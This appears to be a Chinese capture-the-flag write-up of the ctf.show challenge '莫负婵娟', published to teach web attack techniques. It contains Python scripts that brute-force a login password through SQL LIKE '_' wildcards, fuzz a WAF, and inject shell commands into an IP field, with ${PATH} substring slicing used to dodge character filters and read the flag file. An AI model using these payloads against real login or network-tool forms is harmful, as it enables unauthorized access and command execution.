莫负婵娟
经测试发现 % 被WAF,但是 _ 还可以使用,利用 _ 爆破密码长度(_匹配单个字符)。
import requests
url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"
for i in range(50):
exp = '_' * i
payload = {'username': 'yu22x',
'password': exp}
headers = {
'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}
response = requests.request("POST", url, headers=headers, data=payload, files=[])
if response.text.find('wrong username or password') == -1:
print(i)
print(response.text.encode('utf-8'))返回结果:
32
b'<div align="center">I have filtered all the characters. Why can you come in? get out!</div>'说明密码长度有32位长。写个脚本爆破密码:
import requests
import string
url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"
password = ''
headers = {
'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}
files = []
for i in range(32):
for j in string.digits + string.ascii_letters:
exp = '_' * (32 - i - 1)
payload = {'username': 'yu22x',
'password': password + j + exp
}
response = requests.request("POST", url=url, headers=headers, data=payload, files=[])
if response.text.find('wrong username or password') == -1:
password += j
break
print(password)爆出来的密码:
67815b0c009ee970fe4014abaa3Fa6A0登录之后是一个内部网测试平台,初步推测是SSRF漏洞,尝试穿越目录,发现被waf了。写个脚本,fuzz所有可见字符(注意修改Cookies):
import string
import requests
url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php"
file = open('fuzz.txt', 'w')
for i in string.printable:
payload = {'ip': i}
files = [
]
headers = {
'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2'
}
response = requests.request("POST", url, headers=headers, data=payload, files=files)
if response.text.find('evil') == -1:
file.write(i)这个是fuzz.txt文件目录下的字符:
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ 由于Linux系统下的大小写敏感,直接使用ls不可以,尝试利用Linux系统下$PATH变量:
截取字符串:
遍历:
127.0.0.1;${PATH:5:1}${PATH:2:1}找到有flag文件:
读取文件,用 $cat flag.php 或者 $nl flag.txt 都可以
127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.???
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???Last updated
